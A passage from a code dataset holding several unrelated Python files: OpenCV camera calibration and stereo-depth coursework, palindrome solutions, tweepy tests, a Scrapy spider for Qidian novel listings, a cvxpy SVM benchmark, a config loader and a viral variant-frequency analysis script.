cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours2, hierarchy2 = cv2.findContours(\n img2_edge, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n cv2.drawContours(img1, contours1, -1, (0, 0, 255), 2)\n cv2.drawContours(img2, contours2, -1, (0, 0, 255), 2)\n\n print(\"There are \"+str(len(contours1))+\" in coin01\")\n print(\"There are \"+str(len(contours2))+\" in coin02\")\n global count1, count2\n count1 = len(contours1)\n count2 = len(contours2)\n\n # cv2.imshow(\"coin01\", img1)\n cv2.imshow(\"coin01\", img1)\n cv2.imshow(\"coin02\", img2)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef CountContour(label1, label2):\n label1.setText(\"There are \"+str(count1)+\" coins in coin01.jpg\")\n label2.setText(\"There are \"+str(count2)+\" coins in coin02.jpg\")\n\n# endregion\n\n# region 2\n\n\ndef CornerDetection():\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n objp = np.zeros((11*8, 3), np.float32)\n objp[:, :2] = np.mgrid[0:11, 0:8].T.reshape(-1, 2)\n objpoints = []\n imgpoints = []\n images = glob.glob('Datasets/Q2_Image/*.bmp')\n index = 0\n for fname in images:\n img = cv2.imread(fname)\n # img = cv2.resize(img, (512, 512))\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (11, 8), None)\n\n # If found, add object points, image points (after refining them)\n if ret:\n objpoints.append(objp)\n\n corners2 = cv2.cornerSubPix(\n gray, corners, (11, 11), (-1, -1), criteria)\n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (11, 8), corners2, ret)\n index += 1\n img = cv2.resize(img, (1024, 1024))\n cv2.imshow('img'+str(index), img)\n\n global mtx, dist, rvecs, tvecs\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(\n objpoints, imgpoints, gray.shape[::-1], None, None)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef Intrinsic():\n print(\"Intrinsic Matrix:\")\n print(mtx)\n # print(\"\\n\")\n\n\ndef Extrinsic(index):\n print(\"Extrinsic Matrix:\")\n rmtx = 
cv2.Rodrigues(rvecs[index])\n rmtx = rmtx[0]\n emtx = np.column_stack((rmtx, tvecs[index]))\n print(emtx)\n # print(\"\\n\")\n\n\ndef Distortion():\n print(\"Distortion Matrix:\")\n print(dist)\n # print(\"\\n\")\n\n# endregion\n\n# region 3\n\n\ndef AR():\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n objp = np.zeros((11*8, 3), np.float32)\n objp[:, :2] = np.mgrid[0:11, 0:8].T.reshape(-1, 2)\n objpoints = []\n imgpoints = []\n images = glob.glob('Datasets/Q3_Image/*.bmp')\n for fname in images:\n img = cv2.imread(fname)\n # img = cv2.resize(img, (512, 512))\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (11, 8), None)\n\n # If found, add object points, image points (after refining them)\n if ret:\n objpoints.append(objp)\n\n corners2 = cv2.cornerSubPix(\n gray, corners, (11, 11), (-1, -1), criteria)\n imgpoints.append(corners2)\n\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(\n objpoints, imgpoints, gray.shape[::-1], None, None)\n\n pyramidpoint = np.float32([[1, 1, 0], [5, 1, 0], [3, 5, 0], [3, 3, -3]])\n\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, corners = cv2.findChessboardCorners(gray, (11, 8), None)\n\n if ret:\n corners2 = cv2.cornerSubPix(\n gray, corners, (11, 11), (-1, -1), criteria)\n\n # Find the rotation and translation vectors.\n ret, rvecs, tvecs, inliers = cv2.solvePnPRansac(\n objp, corners2, mtx, dist)\n\n # project 3D points to image plane\n imgpts, jac = cv2.projectPoints(\n pyramidpoint, rvecs, tvecs, mtx, dist)\n\n img = DrawPyramid(img, imgpts)\n img = cv2.resize(img, (512, 512))\n cv2.imshow('img', img)\n cv2.waitKey(500)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef DrawPyramid(img, imgpts):\n for i in imgpts:\n print(i.ravel()[0])\n i.ravel()[0]\n\n img = cv2.line(img, tuple(imgpts[0].ravel()), tuple(\n imgpts[1].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[0].ravel()), tuple(\n # imgpts[2].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[0].ravel()), tuple(\n # imgpts[3].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[1].ravel()), tuple(\n # imgpts[2].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[1].ravel()), tuple(\n # imgpts[3].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[2].ravel()), tuple(\n # imgpts[3].ravel()), (255, 128, 0), 5)\n return img\n# endregion\n\n\ndef StereoDisparityMap():\n imgL = cv2.imread(\"Datasets/Q4_Image/imgL.png\", 0)\n imgR = cv2.imread(\"Datasets/Q4_Image/imgR.png\", 0)\n\n stereo = cv2.StereoBM_create(numDisparities=144, blockSize=35)\n disparity = stereo.compute(imgL, imgR)\n disparity = cv2.resize(disparity, (0, 0), fx=0.5, fy=0.5)\n disparity = cv2.normalize(disparity, None, 255, 0,\n cv2.NORM_MINMAX, cv2.CV_8UC1)\n\n h, w = disparity.shape\n cv2.imshow('disparity', disparity)\n\n def mouse(event, x, y, flags, param):\n d = disparity\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.rectangle(d, (w-200, 0), (w, 60), (255, 255, 255), -1)\n text1 = 'Disparity : '+str(disparity[y][x])+\" pixels\"\n cv2.putText(d, text1, (w-200, 20),\n cv2.FONT_ITALIC, 0.6, (0, 255, 255), 2)\n dep = 178*2826/disparity[y][x]\n text2 = 'Depth : ' + str(int(dep))+' mm'\n cv2.putText(d, text2, (w-200, 50),\n cv2.FONT_ITALIC, 0.6, (0, 255, 255), 2)\n cv2.imshow('disparity', d)\n\n cv2.setMouseCallback('disparity', mouse)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef main():\n 
DrawContour()\n\n\nCornerDetection()\n# AR()\n\n\n# images = glob.glob('Datasets/Q2_Image/*.bmp')\n# print(images)\n","repo_name":"hbr890627/yodex","sub_path":"Python/plane_detect.py","file_name":"plane_detect.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37209333028","text":"class Solution:\n \"\"\" Naive make int a string \"\"\"\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n string = str(x)\n length = len(string)\n is_even = length%2\n if length == 1:\n return True\n half = length//2\n return string[:half] == string[half+is_even:][::-1]\n\n\n def isPalindrome_string(self, x):\n x = str(x)\n return x[0::]==x[::-1]\n\n\nclass Solution:\n \"\"\" No extra space, no integer overflow \"\"\"\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n div = 1\n \n while x//div >= 10:\n div *= 10\n \n while x != 0:\n l = x // div\n r = x % 10\n if l != r:\n return False\n \n x = (x % div) // 10\n div //= 100\n \n return True\n\n\nclass Solution:\n \"\"\" No extra space, but possible integer overflow \"\"\"\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0:\n return False\n \n copy, reverse = x, 0\n \n while copy:\n reverse *= 10\n reverse += copy % 10\n copy //= 10\n print(reverse)\n \n return x == reverse\n","repo_name":"chasezimmy/fun","sub_path":"palindrome_number.py","file_name":"palindrome_number.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19028048137","text":"import time\n\nimport unittest\nimport tweepy\n\nfrom constants import *\nfrom main import get_tweet_type_from_text, TweetType, get_user_mentions\n\nclass TestTweetType(unittest.TestCase):\n def setUp(self):\n self.rt_type = \"RT @ubervu: RT @ggerik: Critical for global ...\"\n self.rt_type_id = 424644245992255488\n self.ct_type = \"@anpetre haha, you should ...\"\n self.ct_type_id = 424670463852568576\n self.ot_type = \"tweeting 11 @TED_TALKS link so I don't ...\"\n self.ot_type_id = 400009508526632960\n\n def get_api(self):\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n return api\n\n def test_tweet_type_text(self):\n self.assertEqual(TweetType.OT, get_tweet_type_from_text(self.ot_type))\n self.assertEqual(TweetType.CT, get_tweet_type_from_text(self.ct_type))\n self.assertEqual(TweetType.RT, get_tweet_type_from_text(self.rt_type))\n\n def test_get_user_mentions(self):\n api = self.get_api()\n # RT verify mentions\n tweet = api.get_status(self.rt_type_id)\n tweet_type = get_tweet_type_from_text(tweet['text'])\n self.assertEqual(['ggerik'], get_user_mentions(tweet, tweet_type))\n # CT verify mentions\n tweet = api.get_status(self.ct_type_id)\n tweet_type = get_tweet_type_from_text(tweet['text'])\n self.assertEqual([], get_user_mentions(tweet, tweet_type))\n # OT verify mentions\n tweet = api.get_status(self.ot_type_id)\n tweet_type = get_tweet_type_from_text(tweet['text'])\n self.assertEqual(['TED_TALKS'], get_user_mentions(tweet, tweet_type))\n","repo_name":"andreip/twitter-authorities","sub_path":"tests/test_tweet_type.py","file_name":"test_tweet_type.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} 
+{"seq_id":"41201459899","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Spider,Request\nfrom qidianscrapy.items import QidianscrapyItem\nfrom pyquery import PyQuery as pq\nfrom io import BytesIO\nfrom fontTools.ttLib import TTFont\nimport requests\nimport re\nfrom lxml import etree\n\nclass QidianSpider(scrapy.Spider):\n name = 'qidian'\n allowed_domains = ['www.qidian.com']\n def __init__(self):\n self.start_url = 'https://www.qidian.com/all?%27'\n self.cmap = self.get_font('https://www.qidian.com/all?chanId=21&orderId=&page=1&style=1&pageSize=20&siteid=1&pubflag=0&hiddenField=0')\n self.urls = self.getUrl(self.start_url)\n\n def get_font(self,Pageurl):\n response = requests.get(Pageurl).text\n doc = pq(response)\n # 获取当前字体文件名称\n fonturl = doc('p.update > span > style').text()\n url = re.search('woff.*?url.*?\\'(.+?)\\'.*?truetype', fonturl).group(1)\n response = requests.get(url)\n font = TTFont(BytesIO(response.content))\n cmap = font.getBestCmap()\n font.close()\n return cmap\n\n def getUrl(self,start_url):\n urlList = []\n response = etree.HTML(requests.get(start_url).text)\n # choose mian classify\n first_item = response.xpath('/html/body/div[1]/div[5]/div[1]/div[3]/div[1]/ul//li/a/@href')\n # average 4 select 1\n for url in first_item[1::4]:\n targetUrl = 'https:' + url\n val = etree.HTML(requests.get(targetUrl).text)\n urlList.extend(val.xpath('/html/body/div[1]/div[5]/div[1]/div[3]/div[1]/div/dl//@href'))\n return urlList\n\n def get_encode(self,cmap,values):\n WORD_MAP = {'zero': '0', 'one': '1', 'two': '2', 'three': '3', 'four': '4', 'five': '5', 'six': '6',\n 'seven': '7', 'eight': '8', 'nine': '9', 'period': '.'}\n word_count = ''\n for value in values.split(';'):\n value = value[2:]\n key = cmap[int(value)]\n word_count += WORD_MAP[key]\n return word_count\n\n def start_requests(self):\n for url in self.urls:\n url = 'https:'+url\n # page number\n for i in range(1,5):\n url = url.replace(str(i),str(i+1))\n yield Request(url,self.parse)\n\n def parse(self, response):\n doc = pq(response.text)\n # 获取当前字体文件名称\n classattr = doc('p.update > span > span').attr('class')\n pattern = '(.*?)' % classattr\n # 获取当前页面所有被字数字符\n numberlist = re.findall(pattern, response.text)\n try:\n quotes = response.xpath('/html/body/div[1]/div[5]/div[2]/div[2]/div/ul/li/div[2]')\n except:\n print('Xpath 1 change, please check')\n i=0\n for quote in quotes:\n item = QidianscrapyItem()\n item['Title'] = quote.xpath('h4/a/text()').extract_first()\n item['Author'] = quote.xpath('p[1]/a[1]/text()').extract_first()\n item['Url'] = 'https:'+quote.xpath('h4/a/@href').extract_first()\n item['FictionClass1'] = quote.xpath('p[1]/a[2]/text()').extract_first()\n item['FictionClass2'] = quote.xpath('p[1]/a[3]/text()').extract_first()\n item['State'] = quote.xpath('p[1]/span/text()').extract_first()\n item['Content'] = quote.xpath('p[2]/text()').extract_first().strip()\n try:\n item['Number'] = self.get_encode(self.cmap,numberlist[i][:-1])\n except KeyError:\n self.cmap = self.get_font(response.url)\n item['Number'] = self.get_encode(self.cmap, numberlist[i][:-1])\n i+=1\n yield item\n","repo_name":"GuanLdong/QidianScrapy","sub_path":"qidianscrapy/spiders/qidian.py","file_name":"qidian.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"11113438503","text":"import cvxpy as cp\nimport numpy as np\n\n\nclass SVMWithL1Regularization:\n \"\"\"\n Taken from 
https://stanford.edu/~boyd/papers/cvx_short_course.html\n \"\"\"\n\n def setup(self):\n np.random.seed(1)\n n = 500\n m = 25000\n DENSITY = 0.2\n beta_true = np.random.randn(n, 1)\n idxs = np.random.choice(range(n), int((1 - DENSITY) * n), replace=False)\n for idx in idxs:\n beta_true[idx] = 0\n\n offset = 0\n sigma = 45\n X = np.random.normal(0, 5, size=(m, n))\n Y = np.sign(X.dot(beta_true) + offset + np.random.normal(0, sigma, size=(m, 1)))\n\n # Solve optimization problem\n beta = cp.Variable((n, 1))\n v = cp.Variable()\n loss = cp.sum(cp.pos(1 - cp.multiply(Y, X @ beta - v)))\n reg = cp.norm(beta, 1)\n lambd = cp.Parameter(nonneg=True)\n objective = cp.Minimize(loss / m + lambd * reg)\n problem = cp.Problem(objective)\n self.problem = problem\n\n def time_compile_problem(self):\n self.problem.get_problem_data(solver=cp.SCS)\n\n\nif __name__ == '__main__':\n svm_l1 = SVMWithL1Regularization()\n svm_l1.setup()\n svm_l1.time_compile_problem()\n","repo_name":"cvxpy/benchmarks","sub_path":"benchmark/svm_l1_regularization.py","file_name":"svm_l1_regularization.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} +{"seq_id":"31565613501","text":"from matplotlib import colors\nimport toml\n\n\n# \"#969696\"\ndef hex_to_rgb_percent(hex_str):\n rgb_pct_color = colors.hex2color(hex_str)\n return rgb_pct_color\n\n\n# \"255 255 255\"\ndef rgb_to_percent(rgb_list):\n hex_color = f'#{rgb_list[0]:02x}{rgb_list[1]:02x}{rgb_list[2]:02x}'\n # hex_1 = '#%02x%02x%02x' % (rgb_0[0], rgb_0[1], rgb_0[2])\n rgb_pct_color = colors.hex2color(hex_color)\n return rgb_pct_color\n \n \nclass ConfigLoader():\n \n inst = None\n\n def __new__(cls, file_color=None, file_user=None, file_bili=None, file_ip=None):\n if not cls.inst:\n cls.inst = super(ConfigLoader, cls).__new__(cls)\n cls.inst.file_color = file_color\n # cls.inst.dict_color = cls.inst.read_color()\n # print(cls.inst.dict_color)\n \n cls.inst.file_user = file_user\n # cls.inst.dict_user = cls.inst.read_user()\n # print(cls.inst.dict_user)\n \n cls.inst.file_bili = file_bili\n # cls.inst.dict_bili = cls.inst.read_bili()\n # print(cls.inst.dict_bili)\n # print(\"# 初始化完成\")\n \n cls.inst.file_ip = file_ip\n # cls.inst.dict_ip = cls.inst.read_ip()\n # print(cls.inst.dict_ip)\n return cls.inst\n \n def write_user(self, dict_new, user_id):\n with open(self.file_user, encoding=\"utf-8\") as f:\n dict_user = toml.load(f)\n for i, value in dict_new.items():\n dict_user['users'][user_id][i] = value\n with open(self.file_user, 'w', encoding=\"utf-8\") as f:\n toml.dump(dict_user, f)\n \n def read_bili(self):\n with open(self.file_bili, encoding=\"utf-8\") as f:\n dict_bili = toml.load(f)\n return dict_bili\n \n def read_ip(self):\n with open(self.file_ip, encoding=\"utf-8\") as f:\n dict_ip = toml.load(f)\n return dict_ip\n \n def read_color(self):\n with open(self.file_color, encoding=\"utf-8\") as f:\n dict_color = toml.load(f)\n for i in dict_color.values():\n for j in i.keys():\n if isinstance(i[j], str):\n i[j] = hex_to_rgb_percent(i[j])\n else:\n i[j] = rgb_to_percent(i[j])\n \n return dict_color\n \n def read_user(self):\n with open(self.file_user, encoding=\"utf-8\") as f:\n dict_user = toml.load(f)\n return dict_user\n \n \n \n\n","repo_name":"rabbit2rabbit/bili2.0","sub_path":"config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} 
+{"seq_id":"29621811426","text":"\r\n#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys,os\r\nfrom optparse import OptionParser\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\n\r\n\r\n\r\ndef iSNV_SNP_tableRead(iSNV_SNP_table):\r\n\tiSNVSNPtablels = open(iSNV_SNP_table,'r').readlines()\r\n\tHeaderLs = iSNVSNPtablels[0].split(\"\\n\")[0].split(\"\\t\")\r\n\tHeaderL = []\r\n\tfor HeaderID in HeaderLs:\r\n\t\tif HeaderID != \"#Posi\" and HeaderID != \"snv/SNP\":\r\n\t\t\t\r\n\t\t\tHeaderL.append(HeaderID.split(\".sort\")[0])\r\n\t\telse:\r\n\t\t\tHeaderL.append(HeaderID)\r\n\tlie = 0\r\n\tlieD = {}\r\n\tfor Header in HeaderL:\r\n\t\tlieD[Header] = lie\r\n\t\tlie += 1\r\n\tlsD = {}\r\n\tfor iSNVSNPtablel in iSNVSNPtablels:\r\n\t\tif \"#\" not in iSNVSNPtablel and iSNVSNPtablel != \"\\n\" :\r\n\t\t\tlL = iSNVSNPtablel.split(\"\\n\")[0].split(\"\\t\")\r\n\t\t\tPos = int(lL[0])\r\n\t\t\tlsD[Pos] = lL\r\n\treturn lieD,lsD\r\n\r\n\r\n\r\ndef samp_Freq_Dic(samples,lieD,lsD):\r\n\tsamp_FreqDic = {}\r\n\tsampNA_PosiDic = {}\r\n\tprint(lieD)\r\n\tfor sample in samples:\r\n\t\tLie = lieD[sample]\r\n\t\tsamp_FreqDic[sample] = {}\r\n\t\tsampNA_PosiDic[sample] = []\r\n\t\tfor Posi in lsD:\r\n\t\t\tFreq = lsD[Posi][Lie]\r\n\t\t\tif Freq != \"NA\" :\r\n\t\t\t\tif Freq != \"NO\":\t\t\t\t\r\n\t\t\t\t\tFreq = float(lsD[Posi][Lie])\r\n\t\t\t\t\tif Freq >= 0.02:\r\n\t\t\t\t\t\tsamp_FreqDic[sample][Posi] = Freq\r\n\t\t\t\telse:\r\n\t\t\t\t\tFreq = 0\r\n\t\t\telse:\r\n\t\t\t\tsampNA_PosiDic[sample].append(Posi)\r\n\t#print(samp_FreqDic.keys())\r\n\treturn samp_FreqDic,sampNA_PosiDic\r\n\r\n\r\n\r\ndef Person_NA_Posi(samples,sampNA_PosiDic):\r\n\tpersonNAPosi = {}\r\n\tfor sample in samples:\r\n\t\tsampleNAPosi = sampNA_PosiDic[sample]\r\n\t\tfor posi in sampleNAPosi:\r\n\t\t\tif posi not in personNAPosi:\r\n\t\t\t\tpersonNAPosi[posi] = ''\r\n\treturn personNAPosi\r\n\r\n\r\ndef Person_commonSNP_Posi(samples,samp_FreqDic,lsD):\r\n\tpersonCommonPosi = {}\r\n\tfor posi in lsD.keys():\r\n\t\tcount = 0\r\n\t\tfor sample in samples:\r\n\t\t\tsampleFreqDic = samp_FreqDic[sample]\r\n\t\t\tif posi in sampleFreqDic:\r\n\t\t\t\tFREQ = sampleFreqDic[posi]\r\n\t\t\t\tif FREQ >= snv_MaxFreq:\r\n\t\t\t\t\tcount += 1\r\n\t\tif count == len(samples):\r\n\t\t\tpersonCommonPosi[posi] = ''\t\r\n\treturn personCommonPosi\r\n\r\n\r\n\r\n\r\ndef readInfo(InfoF,person):\r\n\tprint(person)\r\n\tcladeSampDic = {}\r\n\tfor InfoFl in open(InfoF).readlines():\r\n\t\tif \"#\" not in InfoFl:\r\n\t\t\tInfoFl_Tags = InfoFl.split(\"\\n\")[0].split(\"\\t\")\r\n\t\t\tseqID = InfoFl_Tags[18]\r\n\t\t\tclade = InfoFl_Tags[20]\r\n\t\t\tif seqID not in [\"P1-S1\",\"P1-S2\",\"P1-S3\",\"P2-S1\",\"P5-S17\",\"P7-S3\"]:\t\r\n\t\t\t\tif person in clade:\r\n\t\t\t\t\tif clade not in cladeSampDic:\r\n\t\t\t\t\t\tcladeSampDic[clade] = []\r\n\t\t\t\t\tcladeSampDic[clade].append(seqID)\r\n\treturn cladeSampDic\r\n\r\n\r\n\r\n\r\n\r\ndef tongjiFREQ(sample,samp_FreqDic,personNAPosi,personCommonPosi,FiltPosiDic,repeatRegPosi):\r\n\tSampsnv_Lst = {}\r\n\tSampSNP_Lst = {}\r\n\tFreqDic = samp_FreqDic[sample]\r\n\ttongji_Dic = {}\r\n\r\n\tsnvCount,SNPCount = 0,0\r\n\tprint(list(FreqDic.keys())[0:10])\r\n\tfor Posi in FreqDic:\r\n\t\tif (Posi not in personNAPosi) and (Posi not in personCommonPosi) and (Posi not in FiltPosiDic) and (Posi not in repeatRegPosi):\r\n\t\t\tFreq = FreqDic[Posi]\r\n\t\t\tif Freq >= snv_MinFreq and Freq < snv_MaxFreq:\r\n\t\t\t\tsnvCount += 1\r\n\t\t\t\tSampsnv_Lst[Posi] = ''\r\n\r\n\t\t\telif Freq >= snv_MaxFreq 
:\r\n\t\t\t\tSNPCount += 1\r\n\t\t\t\tSampSNP_Lst[Posi] = ''\r\n\treturn Sampsnv_Lst,SampSNP_Lst\r\n\r\n\r\n\r\n\r\ndef readSnpEffF(sample,sampleSnpEffP,Sampsnv_Lst,SampSNP_Lst,CladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic):\r\n\t#PosiGeneDic = {}\r\n\tsnpeffGeneDic = {}\r\n\tEffDic = {}\r\n\tCladeSNV_snpeffGeneDic[sample] = {}\r\n\tCladeSNP_snpeffGeneDic[sample] = {}\r\n\tallFreqDic[sample] = {}\r\n\r\n\tSNV_intraGeneNum = 0\r\n\tSNV_interGeneNum = 0\r\n\tSNP_intraGeneNum = 0\r\n\tSNP_interGeneNum = 0\r\n\r\n\tFreqDic = {}\t\r\n\tsampleSnpEffF = sampleSnpEffP + \"/\" + sample + \".sort.rmdup.mpileup.minFreq0.05.snpeff.vcf\"\r\n\tfor sampleSnpEffFl in open(sampleSnpEffF).readlines():\r\n\t\tif \"#\" not in sampleSnpEffFl and sampleSnpEffFl != \"\\n\":\r\n\t\t\tsampleSnpEffFl_Tags = sampleSnpEffFl.split(\"\\n\")[0].split(\"\\t\")\r\n\t\t\tPosi = int(sampleSnpEffFl_Tags[1])\r\n\t\t\tInfos = sampleSnpEffFl_Tags[7].split(\";\")\r\n\t\t\t\r\n\t\t\tif len(Infos) >5:\r\n\t\t\t\tAnn = Infos[5].split(\",\")[0].split(\"|\")\r\n\t\t\t\tGene = Ann[3]\t\t\t\t\r\n\t\t\t\tEff = Ann[1]\r\n\t\t\t\tEffDic[Posi] = Eff\r\n\t\t\t\tif Eff != \"upstream_gene_variant\" and Eff != \"downstream_gene_variant\":\r\n\t\t\t\t\tsnpeffGeneDic[Posi] = Gene\r\n\t\t\t\t\tPosiGeneDic[Posi] = Gene\r\n\t\t\t\telse:\r\n\t\t\t\t\tif Posi in Sampsnv_Lst:\r\n\t\t\t\t\t\tSNV_interGeneNum += 1\r\n\t\t\t\t\telif Posi in SampSNP_Lst:\r\n\t\t\t\t\t\tSNP_interGeneNum += 1\r\n\t\t\t\t#1/1:255:355:0:355:100.0%\r\n\t\t\t\t\r\n\t\t\t\tFreqInfo= sampleSnpEffFl_Tags[9]\r\n\t\t\t\tFreq = float(FreqInfo.split(\":\")[5].split(\"%\")[0])\r\n\t\t\t\t\r\n\r\n\t\t\t\tFreqDic[Posi] = Freq\r\n\r\n\r\n\r\n\tsnvSnpEffStatDic = {}\r\n\tSNPSnpEffStatDic = {}\r\n\r\n\r\n\r\n\tSNV_syn_Num,SNV_Nonsyn_Num,SNP_syn_Num,SNP_Nonsyn_Num = 0,0,0,0\r\n\r\n\tEff_Stat_Dic = {}\r\n\r\n\r\n\tfor Posi in snpeffGeneDic:\r\n\t\tGENE = snpeffGeneDic[Posi]\r\n\t\tEff = EffDic[Posi]\r\n\r\n\r\n\t\tif Posi in Sampsnv_Lst:\r\n\t\t\tif GENE not in snvSnpEffStatDic:\r\n\t\t\t\tsnvSnpEffStatDic[GENE] = 0\r\n\t\t\tsnvSnpEffStatDic[GENE] += 1\r\n\r\n\t\t\r\n\t\t\tif Eff != \"upstream_gene_variant\" and Eff != \"downstream_gene_variant\":\r\n\t\t\t\tSNV_intraGeneNum += 1\r\n\t\t\t\tif Eff == \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNV_syn\"\r\n\t\t\t\t\tSNV_syn_Num += 1\r\n\t\t\t\t\tEff_Flag = \"iSNV_Syn\"\r\n\t\t\t\telif Eff != \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNV_nonsyn\"\r\n\t\t\t\t\tSNV_Nonsyn_Num += 1\r\n\t\t\t\t\tEff_Flag = \"iSNV_Miss\"\r\n\t\t\t\t\tif Eff != \"missense_variant\":\r\n\t\t\t\t\t\tEff_Flag = \"iSNV_nonCoding\"\r\n\r\n\t\t\t\tif GENE not in Eff_Stat_Dic:\r\n\t\t\t\t\tEff_Stat_Dic[GENE] = {}\r\n\t\t\t\tif Flag not in Eff_Stat_Dic[GENE]:\r\n\t\t\t\t\tEff_Stat_Dic[GENE][Flag] = 0\r\n\t\t\t\tEff_Stat_Dic[GENE][Flag] += 1\r\n\r\n\t\t\t\tallFreqDic[sample][Posi] = {}\r\n\t\t\t\tallFreqDic[sample][Posi][Eff_Flag] = FreqDic[Posi]\r\n\r\n\r\n\r\n\r\n\t\telif Posi in SampSNP_Lst:\r\n\t\t\tif GENE not in SNPSnpEffStatDic:\r\n\t\t\t\tSNPSnpEffStatDic[GENE] = 0\r\n\t\t\tSNPSnpEffStatDic[GENE] += 1\r\n\r\n\t\t\tif Eff != \"upstream_gene_variant\" and Eff != \"downstream_gene_variant\":\r\n\t\t\t\tSNP_intraGeneNum += 1\r\n\t\t\t\tif Eff == \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNP_syn\"\r\n\t\t\t\t\tSNP_syn_Num += 1\r\n\t\t\t\telif Eff != \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNP_nonsyn\"\r\n\t\t\t\t\tSNP_Nonsyn_Num += 1\r\n\t\t\t\t\r\n\t\t\t\tif GENE not in 
Eff_Stat_Dic:\r\n\t\t\t\t\tEff_Stat_Dic[GENE] = {}\r\n\t\t\t\tif Flag not in Eff_Stat_Dic[GENE]:\r\n\t\t\t\t\tEff_Stat_Dic[GENE][Flag] = 0\r\n\t\t\t\tEff_Stat_Dic[GENE][Flag] += 1\r\n\r\n\r\n\r\n\r\n\t#snv_interNumDic[sample] = [SNV_intraGeneNum,SNV_interGeneNum,SNP_intraGeneNum,SNP_interGeneNum,SNV_syn_Num,SNV_Nonsyn_Num,SNP_syn_Num,SNP_Nonsyn_Num]\r\n\tallEff_Stat_Dic[sample] = Eff_Stat_Dic\r\n\tCladeSNV_snpeffGeneDic[sample] = snvSnpEffStatDic\r\n\tCladeSNP_snpeffGeneDic[sample] = SNPSnpEffStatDic\r\n\r\n\r\n\r\n\treturn CladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic\r\n\r\n\r\n\r\ndef FiltEcoliPosi(FiltEcoliPosiF):\r\n\tFiltPosiDic = {}\r\n\tfor FiltEcoliPosiFl in open(FiltEcoliPosiF).readlines():\r\n\t\tif FiltEcoliPosiFl != \"\\n\":\r\n\t\t\tFiltPosiDic[FiltEcoliPosiFl.split(\"\\n\")[0].split(\"\\t\")[0]] = ''\r\n\r\n\treturn FiltPosiDic\r\n\r\n\r\n\r\ndef FiltRefRepeatRegions1(RepeatMaskedGnm):\r\n\tfor RepeatMaskedGnml in open(RepeatMaskedGnm).readlines():\r\n\t\tif \">\" in RepeatMaskedGnml:\r\n\t\t\tgnm = ''\r\n\t\telse:\r\n\t\t\tgnm += RepeatMaskedGnml.split(\"\\n\")[0]\r\n\trepeatRegPosi={}\r\n\tfor gnmPosiIndex in range(0,len(gnm)):\r\n\t\tif gnm[gnmPosiIndex] == \"N\":\r\n\t\t\trepeatRegPosi[gnmPosiIndex+1] = ''\r\n\treturn repeatRegPosi\r\n\r\n\r\ndef FiltRefRepeatRegions(RepeatPosiF):\r\n\trepeatRegPosi = {}\r\n\tfor RepeatPosiFl in open(RepeatPosiF).readlines():\r\n\t\trepeatRegPosi[int(RepeatPosiFl.split(\"\\t\")[0])] = ''\r\n\treturn repeatRegPosi\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n\tperson = iSNV_SNP_table.split(\"/\")[-2]\r\n\tif person == \"P5_withP2\":\r\n\t\tperson = \"P5\"\r\n\tlieD,lsD = 